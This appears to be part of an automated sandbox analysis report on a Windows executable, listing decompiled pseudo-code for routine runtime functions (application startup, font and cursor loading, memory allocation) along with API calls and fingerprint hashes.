				void* _t97;
				char _t99;
				void* _t111;
				void* _t112;

				_t99 = __edx;
				_t97 = __ecx;
				if(__edx != 0) {
					_t112 = _t112 + 0xfffffff0;
					_t44 = E0040378C(_t44, _t111);
				}
				_v5 = _t99;
				_t96 = _t44;
				E00419808(_t97, 0);
				_t47 =  *0x479f3c; // 0x4793c4
				if( *((short*)(_t47 + 2)) == 0) {
					_t95 =  *0x479f3c; // 0x4793c4
					 *((intOrPtr*)(_t95 + 4)) = _t96;
					 *_t95 = 0x44b2cc;
				}
				_t48 =  *0x479fe0; // 0x4793cc
				if( *((short*)(_t48 + 2)) == 0) {
					_t94 =  *0x479fe0; // 0x4793cc
					 *((intOrPtr*)(_t94 + 4)) = _t96;
					 *_t94 = E0044B4C4;
				}
				 *((char*)(_t96 + 0x34)) = 0;
				 *((intOrPtr*)(_t96 + 0x90)) = E0040343C(1);
				 *((intOrPtr*)(_t96 + 0xa8)) = E0040343C(1);
				 *((intOrPtr*)(_t96 + 0x60)) = 0;
				 *((intOrPtr*)(_t96 + 0x84)) = 0;
				 *((intOrPtr*)(_t96 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_t96 + 0x78)) = 0x1f4;
				 *((char*)(_t96 + 0x7c)) = 1;
				 *((intOrPtr*)(_t96 + 0x80)) = 0;
				 *((intOrPtr*)(_t96 + 0x74)) = 0x9c4;
				 *((char*)(_t96 + 0x88)) = 0;
				 *((char*)(_t96 + 0x9d)) = 1;
				 *((char*)(_t96 + 0xb4)) = 1;
				 *((intOrPtr*)(_t96 + 0x98)) = E00421670(1);
				_t58 =  *0x479e68; // 0x47b02c
				E00421A40(_t57, LoadIconA( *_t58, "MAINICON"));
				_t20 = _t96 + 0x98; // 0x736d
				_t63 =  *_t20;
				 *((intOrPtr*)(_t63 + 0x14)) = _t96;
				 *((intOrPtr*)(_t63 + 0x10)) = 0x44bb14;
				_t65 =  *0x479e68; // 0x47b02c
				GetModuleFileNameA( *_t65,  &_v268, 0x100);
				OemToCharA( &_v268,  &_v268);
				_v12 = E0040C394( &_v268, _t97, 0x5c);
				if(_v12 != 0) {
					E0040867C( &_v268, _v12 + 1);
				}
				_v12 = E0040C3DC( &_v268, _t97, 0x2e);
				if(_v12 != 0) {
					 *_v12 = 0;
				}
				_t76 = CharNextA( &_v268); // executed
				CharLowerA(_t76);
				_t36 = _t96 + 0x8c; // 0x442168
				E00404450(_t36, 0x100,  &_v268);
				_t80 =  *0x479d6c; // 0x47b034
				if( *_t80 == 0) {
					E0044A074(_t96, _t96, 0x100); // executed
				}
				 *((char*)(_t96 + 0x59)) = 1;
				 *((char*)(_t96 + 0x5a)) = 1;
				 *((char*)(_t96 + 0x5b)) = 1;
				 *((char*)(_t96 + 0x9e)) = 1;
				 *((intOrPtr*)(_t96 + 0xa0)) = 0;
				E0044BCF0(_t96, 0x100);
				E0044C6D8(_t96);
				_t86 = _t96;
				if(_v5 != 0) {
					E004037E4(_t86);
					_pop( *[fs:0x0]);
				}
				return _t96;
			}

0x00449d58
0x00449d58
0x00449d65
0x00449d67
0x00449d6a
0x00449d6a
0x00449d6f
0x00449d72
0x00449d78
0x00449d7d
0x00449d87
0x00449d89
0x00449d8e
0x00449d91
0x00449d91
0x00449d97
0x00449da1
0x00449da3
0x00449da8
0x00449dab
0x00449dab
0x00449db1
0x00449dc1
0x00449dd3
0x00449ddb
0x00449de0
0x00449de6
0x00449ded
0x00449df4
0x00449dfa
0x00449e00
0x00449e07
0x00449e0e
0x00449e15
0x00449e2a
0x00449e35
0x00449e46
0x00449e4b
0x00449e4b
0x00449e51
0x00449e54
0x00449e67
0x00449e6f
0x00449e82
0x00449e94
0x00449e9b
0x00449ea7
0x00449ea7
0x00449eb9
0x00449ec0
0x00449ec5
0x00449ec5
0x00449ecf
0x00449ed5
0x00449eda
0x00449eeb
0x00449ef0
0x00449ef8
0x00449efc
0x00449efc
0x00449f01
0x00449f05
0x00449f09
0x00449f0d
0x00449f16
0x00449f1e
0x00449f25
0x00449f2a
0x00449f30
0x00449f32
0x00449f37
0x00449f3e
0x00449f48

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 00449E3D
GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449E6F
OemToCharA.USER32(?,?), ref: 00449E82
CharNextA.USER32(?,00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449ECF
CharLowerA.USER32(00000000,?,00400000,?,00000100,?,?,?,00437210,00000000,00000000,?,?,00000000,00437278), ref: 00449ED5

Strings

MAINICON, xrefs: 00449E30

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Char$FileIconLoadLowerModuleNameNext
String ID: MAINICON
API String ID: 3256280155-2283262055
Opcode ID: 05d21aa22ea9c7efec68fc6d9cb4501e819924d88bf3c8ddec1fbc618abea674
Instruction ID: 92475986e9d9992ff72ecf269a4b4a4657f5706d7a07ba4ebe13b7d56500ee20
Opcode Fuzzy Hash: 05d21aa22ea9c7efec68fc6d9cb4501e819924d88bf3c8ddec1fbc618abea674
Instruction Fuzzy Hash: 3F5120709042448FDB41DF69D8C5BC97BE4AB15308F0480BAE848DF397DBB99D88CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00449450, Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00449450(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x47bb9c != 0) {
					_t54 =  *0x47bb9c; // 0x2321704
					_t2 = _t54 + 0x88; // 0x1
					_v5 =  *_t2;
				}
				_push(_t74);
				_push(0x449595);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x47bb9c != 0) {
					_t52 =  *0x47bb9c; // 0x2321704
					E0044B88C(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041CA24( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041CA24( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E0041CB08( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041CA24( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E0041CA24( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041CA24( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E0041C868( *_t16, 0xff000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041C868( *_t17, 0xff000007);
				 *[fs:eax] = 0xff000007;
				_push(0x44959c);
				if( *0x47bb9c != 0) {
					_t38 =  *0x47bb9c; // 0x2321704
					return E0044B88C(_t38, _v5);
				}
				return 0;
			}

0x00449450
0x00449451
0x00449453
0x0044945a
0x0044945c
0x00449467
0x00449469
0x0044946e
0x00449474
0x00449474
0x00449479
0x0044947a
0x0044947f
0x00449482
0x0044948c
0x00449490
0x00449495
0x00449495
0x004494ab
0x004494c7
0x004494ce
0x004494d4
0x004494ad
0x004494b1
0x004494b8
0x004494be
0x004494be
0x004494d9
0x004494f0
0x004494f7
0x0044952d
0x00449538
0x0044953f
0x00449546
0x0044954c
0x004494f9
0x00449500
0x00449507
0x0044950d
0x00449519
0x00449520
0x00449526
0x00449526
0x00449551
0x0044955c
0x00449561
0x0044956c
0x00449576
0x00449579
0x00449585
0x0044958a
0x00000000
0x0044958f
0x00449594

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004494A4
CreateFontIndirectA.GDI32(?), ref: 004494B1
GetStockObject.GDI32(0000000D), ref: 004494C7

Part of subcall function 0041CB08: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041CB15

SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004494F0
CreateFontIndirectA.GDI32(?), ref: 00449500
CreateFontIndirectA.GDI32(?), ref: 00449519
GetStockObject.GDI32(0000000D), ref: 0044953F

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 28951050b266b203e9353fbab2d7e8e42f92628062245b1178383aee8633c048
Instruction ID: 8691ace67e623fd5a667961d2ac2376c2f2b6bc9dda70795445b191ca38ebe6a
Opcode Fuzzy Hash: 28951050b266b203e9353fbab2d7e8e42f92628062245b1178383aee8633c048
Instruction Fuzzy Hash: 0431A630754204ABEB51FB69DC82B9A33E4AB44304F548076B94CDB2DBDA78AC45CF29

Uniqueness

Uniqueness Score: -1.00%

Function 00401B76, Relevance: 6.1, APIs: 4, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401B76() {
				intOrPtr* _v8;
				void* _t17;
				signed int _t19;
				intOrPtr _t28;
				void* _t29;
				intOrPtr _t34;

				_push(_t34);
				_push(E00401C40);
				_push( *[fs:edx]);
				 *[fs:edx] = _t34;
				_push(0x47b5c4);
				L00401350();
				if( *0x47b045 != 0) {
					_push(0x47b5c4);
					L00401358();
				}
				E004013F4(0x47b5e4);
				E004013F4(0x47b5f4);
				E004013F4(0x47b620);
				_t17 = LocalAlloc(0, 0xff8); // executed
				 *0x47b61c = _t17;
				if( *0x47b61c != 0) {
					_t19 = 3;
					do {
						_t29 =  *0x47b61c; // 0x5bc9b8
						 *((intOrPtr*)(_t29 + _t19 * 4 - 0xc)) = 0;
						_t19 = _t19 + 1;
					} while (_t19 != 0x401);
					_v8 = 0x47b604;
					 *((intOrPtr*)(_v8 + 4)) = _v8;
					 *_v8 = _v8;
					 *0x47b610 = _v8;
					 *0x47b5bc = 1;
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E00401C47);
				if( *0x47b045 != 0) {
					_push(0x47b5c4);
					L00401360();
					return 0;
				}
				return 0;
			}

0x00401b7e
0x00401b7f
0x00401b84
0x00401b87
0x00401b8a
0x00401b8f
0x00401b9b
0x00401b9d
0x00401ba2
0x00401ba2
0x00401bac
0x00401bb6
0x00401bc0
0x00401bcc
0x00401bd1
0x00401bdd
0x00401bdf
0x00401be4
0x00401be4
0x00401bec
0x00401bf0
0x00401bf1
0x00401bf8
0x00401c05
0x00401c0e
0x00401c13
0x00401c18
0x00401c18
0x00401c21
0x00401c24
0x00401c27
0x00401c33
0x00401c35
0x00401c3a
0x00000000
0x00401c3a
0x00401c3f

APIs

RtlInitializeCriticalSection.NTDLL(0047B5C4), ref: 00401B8F
RtlEnterCriticalSection.NTDLL(0047B5C4), ref: 00401BA2
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401C40), ref: 00401BCC
RtlLeaveCriticalSection.NTDLL(0047B5C4), ref: 00401C3A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 67454cfca43f0267e9263a94266ffb6b98c2692df696fa2f445533be90ddefb8
Instruction ID: 3e142aa4a2e204c3b9438245db62d6d6d1a92e12098fe18446b9b4d1fc31f7ac
Opcode Fuzzy Hash: 67454cfca43f0267e9263a94266ffb6b98c2692df696fa2f445533be90ddefb8
Instruction Fuzzy Hash: 40118EB0A48245AFE715EB6A8901B9AB7E1EB45308F10C07BF508A77E1C77C9940DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401B78, Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401B78() {
				intOrPtr* _v8;
				void* _t17;
				signed int _t19;
				intOrPtr _t28;
				void* _t29;
				intOrPtr _t34;

				_push(_t34);
				_push(E00401C40);
				_push( *[fs:edx]);
				 *[fs:edx] = _t34;
				_push(0x47b5c4);
				L00401350();
				if( *0x47b045 != 0) {
					_push(0x47b5c4);
					L00401358();
				}
				E004013F4(0x47b5e4);
				E004013F4(0x47b5f4);
				E004013F4(0x47b620);
				_t17 = LocalAlloc(0, 0xff8); // executed
				 *0x47b61c = _t17;
				if( *0x47b61c != 0) {
					_t19 = 3;
					do {
						_t29 =  *0x47b61c; // 0x5bc9b8
						 *((intOrPtr*)(_t29 + _t19 * 4 - 0xc)) = 0;
						_t19 = _t19 + 1;
					} while (_t19 != 0x401);
					_v8 = 0x47b604;
					 *((intOrPtr*)(_v8 + 4)) = _v8;
					 *_v8 = _v8;
					 *0x47b610 = _v8;
					 *0x47b5bc = 1;
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E00401C47);
				if( *0x47b045 != 0) {
					_push(0x47b5c4);
					L00401360();
					return 0;
				}
				return 0;
			}

APIs

RtlInitializeCriticalSection.NTDLL(0047B5C4), ref: 00401B8F
RtlEnterCriticalSection.NTDLL(0047B5C4), ref: 00401BA2
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401C40), ref: 00401BCC
RtlLeaveCriticalSection.NTDLL(0047B5C4), ref: 00401C3A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: b6d80f13ff715241ca5bf995b1febabb0cb351f15c19564836d61e8c853322d1
Instruction ID: 13d9f034b082f7c1e47b122caaa5f201a4d4fe53c14004c021a2778dc1c28102
Opcode Fuzzy Hash: b6d80f13ff715241ca5bf995b1febabb0cb351f15c19564836d61e8c853322d1
Instruction Fuzzy Hash: 6C1190B0A48245AFE715EB6AC901B9EB7E1EB45308F10C07BE508A77E1C77C9940DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004224C4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004224C4(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x47b938 == 0) {
					 *0x47b910 = E004223DC(0, _t8,  *0x47b910, _t17, _t18);
					_t7 =  *0x47b910(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}

0x004224c8
0x004224d2
0x004224e6
0x004224ec
0x00000000
0x004224ec
0x004224f4
0x004224fc
0x004224fc
0x004224ff
0x00422513
0x00422501
0x00422501
0x00422517
0x00422503
0x00422503
0x00422503
0x00422504
0x0042251b
0x00422506
0x00422507
0x0042250a
0x0042250c
0x0042250c
0x0042250a
0x00422504
0x00422501
0x00422520
0x00422523
0x0042252d
0x00422525
0x00000000
0x00422526

APIs

GetSystemMetrics.USER32(?), ref: 00422526

Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C

KiUserCallbackDispatcher.NTDLL(?), ref: 004224EC

Strings

GetSystemMetrics, xrefs: 004224D4

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressCallbackDispatcherMetricsProcSystemUser
String ID: GetSystemMetrics
API String ID: 54681038-96882338
Opcode ID: 9120b39a1c952422c7a2f2bc6e6230ad17a44d77e4132149589b957536ae4e38
Instruction ID: 61893786ead7442b141782ae33ef24c81ab3f08944c6df3ae78c7b5cce71f94f
Opcode Fuzzy Hash: 9120b39a1c952422c7a2f2bc6e6230ad17a44d77e4132149589b957536ae4e38
Instruction Fuzzy Hash: 7EF0C2A03051147ACA115A38BFA43233505E755334FE0CB27A325862D5DBFD88C1524D

Uniqueness

Uniqueness Score: -1.00%

Function 004023D4, Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

APIs

Part of subcall function 00401B78: RtlInitializeCriticalSection.NTDLL(0047B5C4), ref: 00401B8F
Part of subcall function 00401B78: RtlEnterCriticalSection.NTDLL(0047B5C4), ref: 00401BA2
Part of subcall function 00401B78: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401C40), ref: 00401BCC
Part of subcall function 00401B78: RtlLeaveCriticalSection.NTDLL(0047B5C4), ref: 00401C3A

RtlEnterCriticalSection.NTDLL(0047B5C4), ref: 0040241D
RtlLeaveCriticalSection.NTDLL(0047B5C4), ref: 0040256A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID:
API String ID: 2227675388-0
Opcode ID: a4d65b0a6d92e3d8387b000d624c99de197c7ddb0f799f075070be329c2464f0
Instruction ID: b52d1db9be2b77f96f069aba8dce174cc18355d9363bc801bcba1231b71f0c2b
Opcode Fuzzy Hash: a4d65b0a6d92e3d8387b000d624c99de197c7ddb0f799f075070be329c2464f0
Instruction Fuzzy Hash: FC512EB0E002099FDB10CF69DA85A5EB7F1FB48314F24817AD819A73D1D3789981CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00448C44, Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00448C44(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E0040378C(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E00419808(_t63, 0);
				_t28 =  *0x479e04; // 0x4793b4
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x448fe8;
				_t29 =  *0x479e10; // 0x4793bc
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x448ff4;
				E00449000(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E0040343C(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E0040343C(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E0040343C(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E0040343C(1);
				_t42 = E0040343C(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L0040677C();
				_t75 = _t42;
				L00406514();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L004069B4();
				_t11 = _t62 + 0x58; // 0x4420046e
				_t45 =  *0x479f50; // 0x47b92c
				 *((intOrPtr*)( *_t45))(0, 0, E00445418,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E0041C694(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E0041C694(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E0041C694(1);
				E00449450(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x449318;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x449318;
				_t21 = _t62 + 0x80; // 0x94000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x449318;
				_t59 = _t62;
				if(_v5 != 0) {
					E004037E4(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}

0x00448c44
0x00448c44
0x00448c4c
0x00448c4e
0x00448c51
0x00448c51
0x00448c56
0x00448c59
0x00448c5f
0x00448c64
0x00448c69
0x00448c6c
0x00448c72
0x00448c77
0x00448c7a
0x00448c82
0x00448c8e
0x00448c9d
0x00448cac
0x00448cbb
0x00448cca
0x00448cd4
0x00448cd9
0x00448cde
0x00448ce3
0x00448ce8
0x00448ced
0x00448cf3
0x00448cf8
0x00448d06
0x00448d0d
0x00448d1b
0x00448d2d
0x00448d3f
0x00448d47
0x00448d4c
0x00448d4c
0x00448d52
0x00448d55
0x00448d5c
0x00448d5c
0x00448d62
0x00448d65
0x00448d6c
0x00448d6c
0x00448d72
0x00448d75
0x00448d7c
0x00448d82
0x00448d84
0x00448d89
0x00448d90
0x00448d99

APIs

GetKeyboardLayout.USER32(00000000), ref: 00448C89
72E7AC50.USER32(00000000,?,?,00000000,?,004371FA,00000000,00000000,?,?,00000000,00437278), ref: 00448CDE

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: KeyboardLayout
String ID:
API String ID: 194098044-0
Opcode ID: f1f0f8e711b1a06e5d00e45fe006f41a4c385eb94d7e613cd437ce41573341e4
Instruction ID: 19571bcea3be0b8c6a5e08f2715e41f6178fab2f008b285dc990ddbe9316995e
Opcode Fuzzy Hash: f1f0f8e711b1a06e5d00e45fe006f41a4c385eb94d7e613cd437ce41573341e4
Instruction Fuzzy Hash: 37310CB06002409FD740EF29DCC1B997BE4BB05319F4490BAE908DF3A6D7399C48CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00449000, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00449000(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x479c38;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x47b660; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E004490D4(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}

0x00449004
0x00449012
0x00449015
0x0044901a
0x0044901f
0x00449022
0x0044902c
0x00449036
0x00000000
0x00000000
0x00000000
0x0044902e
0x0044902e
0x0044902e
0x0044902e
0x0044903c
0x00449047
0x0044904c
0x0044904d
0x00449050
0x00449059

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 0044900D
LoadCursorA.USER32(00000000,00000000), ref: 0044903C

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: 3e82a63330fc6ccb9e9839bef3e6e645eb624abf4ff21a79ec716908bc4b4c75
Instruction ID: 3d37015a7f1900adb8c35d2b4518091dae2baef75b5dba2374cc50d155544614
Opcode Fuzzy Hash: 3e82a63330fc6ccb9e9839bef3e6e645eb624abf4ff21a79ec716908bc4b4c75
Instruction Fuzzy Hash: BBF08221A002451BAA30563E5CC1A7B73C4DB81734F20033BFA3AC72E1CA3A5C416259

Uniqueness

Uniqueness Score: -1.00%

Function 004015D8, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015D8(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E004013FC(0x47b5e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x004015db
0x004015e5
0x004015f4
0x004015e7
0x004015e7
0x004015e7
0x004015fa
0x00401607
0x0040160c
0x0040160e
0x00401612
0x0040161b
0x00401622
0x0040162e
0x00401635
0x00000000
0x00401635
0x00401622
0x0040163a

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0040196B), ref: 00401607
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0040196B), ref: 0040162E

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
